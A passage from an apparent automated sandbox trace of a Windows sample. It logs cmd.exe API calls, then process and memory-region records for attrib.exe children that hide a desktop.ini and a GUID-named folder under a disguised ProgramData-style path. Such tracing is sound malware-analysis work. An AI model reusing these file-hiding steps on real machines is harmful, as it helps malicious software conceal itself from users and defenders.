nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.785] _close (_FileHandle=4) returned 0 [0147.785] FindNextFileW (in: hFindFile=0x29e768, lpFindFileData=0x22ed08 | out: lpFindFileData=0x22ed08) returned 0 [0147.785] GetLastError () returned 0x12 [0147.785] FindClose (in: hFindFile=0x29e768 | out: hFindFile=0x29e768) returned 1 [0147.785] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0147.788] _close (_FileHandle=3) returned 0 [0147.788] GetConsoleTitleW (in: lpConsoleTitle=0x22f140, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.789] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.789] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.789] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.789] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.789] GetLastError () returned 0x2 [0147.789] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.789] GetLastError () returned 0x2 [0147.790] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0x2a2ed8 [0147.790] FindClose (in: hFindFile=0x2a2ed8 | out: hFindFile=0x2a2ed8) returned 1 [0147.790] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.790] GetLastError () returned 0x2 [0147.790] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0x2a2ed8 [0147.790] FindClose (in: hFindFile=0x2a2ed8 | out: hFindFile=0x2a2ed8) returned 1 [0147.790] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.790] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.790] GetConsoleTitleW (in: lpConsoleTitle=0x22eed4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.790] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ed5c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ee24 | out: lpAttributeList=0x22ed5c, lpSize=0x22ee24) returned 1 [0147.790] UpdateProcThreadAttribute (in: lpAttributeList=0x22ed5c, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ee1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ed5c, lpPreviousValue=0x0) returned 1 [0147.790] GetStartupInfoW (in: lpStartupInfo=0x22ed18 | out: lpStartupInfo=0x22ed18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.791] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.791] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22edb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ee04 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", lpProcessInformation=0x22ee04*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb60, dwThreadId=0xb0c)) returned 1 [0147.792] CloseHandle (hObject=0x50) returned 1 [0147.792] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.792] GetEnvironmentStringsW () returned 0x2a2ed8* [0147.792] FreeEnvironmentStringsW (penv=0x2a2ed8) returned 1 [0147.792] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0147.848] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22ecf8 | out: lpExitCode=0x22ecf8*=0x0) returned 1 [0147.848] CloseHandle (hObject=0x4c) returned 1 [0147.848] _vsnwprintf (in: _Buffer=0x22ee40, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ed04 | out: _Buffer="00000000") returned 8 [0147.848] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0147.848] GetEnvironmentStringsW () returned 0x2a2ed8* [0147.848] FreeEnvironmentStringsW (penv=0x2a2ed8) returned 1 [0147.848] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.848] GetEnvironmentStringsW () returned 0x2a2ed8* [0147.849] FreeEnvironmentStringsW (penv=0x2a2ed8) returned 1 [0147.849] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ed5c | out: lpAttributeList=0x22ed5c) [0147.849] GetConsoleTitleW (in: lpConsoleTitle=0x22f140, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.849] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.849] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.849] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.849] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.849] GetLastError () returned 0x2 [0147.850] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.850] GetLastError () returned 0x2 [0147.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0x29e768 [0147.850] FindClose (in: hFindFile=0x29e768 | out: hFindFile=0x29e768) returned 1 [0147.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.850] GetLastError () returned 0x2 [0147.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0x29e768 [0147.850] FindClose (in: hFindFile=0x29e768 | out: hFindFile=0x29e768) returned 1 [0147.850] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.850] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.850] GetConsoleTitleW (in: lpConsoleTitle=0x22eed4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.850] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ed5c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ee24 | out: lpAttributeList=0x22ed5c, lpSize=0x22ee24) returned 1 [0147.850] UpdateProcThreadAttribute (in: lpAttributeList=0x22ed5c, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ee1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ed5c, lpPreviousValue=0x0) returned 1 [0147.851] GetStartupInfoW (in: lpStartupInfo=0x22ed18 | out: lpStartupInfo=0x22ed18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.851] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.851] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22edb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ee04 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", lpProcessInformation=0x22ee04*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa40, dwThreadId=0xba4)) returned 1 [0147.852] CloseHandle (hObject=0x4c) returned 1 [0147.852] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.852] GetEnvironmentStringsW () returned 0x2a3938* [0147.852] FreeEnvironmentStringsW (penv=0x2a3938) returned 1 [0147.852] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0147.920] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22ecf8 | out: lpExitCode=0x22ecf8*=0x0) returned 1 [0147.920] CloseHandle (hObject=0x50) returned 1 [0147.920] _vsnwprintf (in: _Buffer=0x22ee40, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ed04 | out: _Buffer="00000000") returned 8 [0147.920] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0147.920] GetEnvironmentStringsW () returned 0x2a3938* [0147.920] FreeEnvironmentStringsW (penv=0x2a3938) returned 1 [0147.920] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.920] GetEnvironmentStringsW () returned 0x2a3938* [0147.920] FreeEnvironmentStringsW (penv=0x2a3938) returned 1 [0147.920] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ed5c | out: lpAttributeList=0x22ed5c) [0147.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.921] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.921] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.921] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.921] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.921] SetConsoleInputExeNameW () returned 0x1 [0147.921] GetConsoleOutputCP () returned 0x1b5 [0147.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.921] exit (_Code=0) Process: id = "215" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "214" os_parent_pid = "0xb74" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18390 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18391 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18392 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18393 start_va = 0x190000 end_va = 0x196fff entry_point = 0x190000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18394 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 18395 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18396 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18397 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18398 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 18399 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18400 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18401 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18402 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18403 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 18404 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 18405 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18406 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18407 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18408 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18409 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18410 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18411 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18412 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18413 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18414 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18415 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18416 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18417 start_va = 0x430000 end_va = 0x4f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 18418 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18419 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 273 os_tid = 0xa34 Process: id = "216" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0xb60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "214" os_parent_pid = "0xb74" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18482 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18483 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18484 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18485 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 18486 start_va = 0x240000 end_va = 0x246fff entry_point = 0x240000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18487 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18488 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18489 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18490 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 18491 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18492 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18493 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18494 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18495 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 18496 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 18497 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18498 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 